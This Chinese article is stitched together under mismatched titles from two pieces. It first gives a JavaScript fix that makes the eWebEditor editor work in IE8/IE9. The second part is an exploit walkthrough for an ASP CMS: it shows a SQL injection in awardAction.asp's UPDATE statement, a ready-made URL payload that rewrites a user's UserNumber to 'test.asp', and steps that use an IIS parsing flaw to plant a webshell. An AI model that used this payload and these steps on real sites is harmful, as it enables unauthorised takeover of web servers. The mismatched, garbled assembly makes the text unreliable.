《浅析asp版本ewebeditor在线编辑器2篇》

浅析asp版本ewebeditor在线编辑器 篇1

这篇文章主要介绍了让IE8和IE9支持eWebEditor在线编辑器的方法，eWebEditor常用在ASP制作的网站后台中，是比较古老的一款在线编辑器了，需要让IE8和IE9支持的朋友可以参考下

最近在做网站的时候，发现eWebEditor在线文本编辑器不支持IE9，点击编辑器中的按钮都没有反应，之前本站发布过一篇《解决IE8不支持eWebEditor在线文本编辑器的方法》，但貌似在IE9下方法就失效了，在网上找到了终级解决方法，拿来给大家分享，

首先找到eWebEditor编辑器所在的目录，然后搜索到editor.js文件并用文本编辑器打开，然后找到BtnMouseUp函数，将该函数代码替换成如下代码即可：

代码如下：

function BtnMouseUp() {

if (event.srcElement.tagName != ”IMG“) {

event.cancelBubble = true;

return false;

}

var image = event.srcElement;

var element = image.parentElement;

try{

if (element.YUSERONCLICK) eval(element.YUSERONCLICK + ”anonymous()“);

}

catch(e){

if (element.YUSERONCLICK) eval(element.YUSERONCLICK + ”onclick(event)“);

}

element.className = ”BtnMouseOverUp“;

image.className = ”Ico“;

event.cancelBubble = true;

return false;

}

说明：以上代码中蓝色部分为eWebEditor在线文本编辑器兼容IE9IE8的核心代码，大家也可以根据实际情况更换BtnMouseUp()函数中的相应代码，

小提示：如果你的eWebEditor在线文本编辑器版本过老，在IE9下根本都无法打开eWebEditor界面，你可以在IE9中设置成浏览器兼容模式，即可正常在IE9中使用eWebEditor了。

让IE8和IE9支持eWebEditor在线编辑器的方法 篇2

在文件\User\award\awardA→←ction.asp中：

1

2

3

4

5

6

7

8

9

Integral=NoSqlHack(request.QueryString(“Integral”))

ifaction=“join”then

User_Conn.execute(“Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values(”&CintStr(prizeID)&“,'”&session(“FS_UserNumber”)&“',”&CintStr(awardID)&“)”)

'获得当前参加人数--------------------------------

User_Conn.execute(“Update FS_ME_Users set Integral=(Integral-”&Integral&“) where usernumber='”&session(“FS_UserNumber”)&“'”)

请直接无视NoSqlHack,由于sql注入是发生在update语句中，所以我们可以修改表S_ME_Users的任意记录的任意字段信息

webshell还可以用来代替access

我们文件管理中上传个图片文件：

192.168.1.101/UserFiles/27015564I69/_09_27_01_10_0390446.jpg

UserNumber就是等于27015564I69

通过以上的sql注入漏洞，直接update为test.asp

192.168.1.101/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=1),UserNumber=0x74006500730074002E00610073007000,sex=(1

退出再重新登录

生成test.asp目录，后续上传的文件都会保存在该文件中

利用iis解析漏洞获取webshell

​